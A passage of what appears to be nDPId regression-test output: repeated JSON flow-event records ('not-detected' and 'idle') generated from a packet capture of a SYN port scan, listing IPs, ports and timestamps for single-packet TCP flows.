{"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1263,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060392,"flow_last_seen":1278275060392,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8194,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00591{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":544,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059346,"flow_last_seen":1278275059346,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00576{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":544,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059346,"flow_last_seen":1278275059346,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":194,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058281,"flow_last_seen":1278275058281,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":49155,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":194,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058281,"flow_last_seen":1278275058281,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":49155,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1569,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060801,"flow_last_seen":1278275060801,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":32771,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1569,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060801,"flow_last_seen":1278275060801,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":32771,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1965,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061358,"flow_last_seen":1278275061358,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":10243,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1965,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061358,"flow_last_seen":1278275061358,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":10243,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1332,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060492,"flow_last_seen":1278275060492,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":32772,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1332,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060492,"flow_last_seen":1278275060492,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":32772,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":793,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059736,"flow_last_seen":1278275059736,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":49156,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":793,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059736,"flow_last_seen":1278275059736,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":49156,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00591{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":841,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059786,"flow_last_seen":1278275059786,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00576{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":841,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059786,"flow_last_seen":1278275059786,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00591{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":603,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059455,"flow_last_seen":1278275059455,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00576{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":603,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059455,"flow_last_seen":1278275059455,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":221,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058405,"flow_last_seen":1278275058405,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":49155,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":221,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058405,"flow_last_seen":1278275058405,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":49155,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1951,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061314,"flow_last_seen":1278275061314,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":49157,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1951,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061314,"flow_last_seen":1278275061314,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":49157,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1413,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060596,"flow_last_seen":1278275060596,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":32772,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1413,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060596,"flow_last_seen":1278275060596,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":32772,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1177,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060287,"flow_last_seen":1278275060287,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":32773,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1177,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060287,"flow_last_seen":1278275060287,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":32773,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00591{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":906,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059895,"flow_last_seen":1278275059895,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00576{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":906,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059895,"flow_last_seen":1278275059895,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":862,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059846,"flow_last_seen":1278275059846,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":49156,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":862,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059846,"flow_last_seen":1278275059846,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":49156,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1971,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061415,"flow_last_seen":1278275061415,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":49157,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1971,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061415,"flow_last_seen":1278275061415,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":49157,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1230,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060387,"flow_last_seen":1278275060387,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":32773,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1230,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060387,"flow_last_seen":1278275060387,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":32773,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":954,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059957,"flow_last_seen":1278275059957,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":49158,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":954,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059957,"flow_last_seen":1278275059957,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":49158,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":585,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059410,"flow_last_seen":1278275059410,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":32774,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":585,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059410,"flow_last_seen":1278275059410,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":32774,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00590{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057743,"flow_last_seen":1278275057743,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00575{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057743,"flow_last_seen":1278275057743,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1627,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060902,"flow_last_seen":1278275060902,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":49159,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1627,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060902,"flow_last_seen":1278275060902,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":49159,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1001,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060065,"flow_last_seen":1278275060065,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":49158,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1001,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060065,"flow_last_seen":1278275060065,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":49158,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1843,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061207,"flow_last_seen":1278275061207,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":32775,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1843,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061207,"flow_last_seen":1278275061207,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":32775,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":670,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059522,"flow_last_seen":1278275059522,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":32774,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":670,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059522,"flow_last_seen":1278275059522,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":32774,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 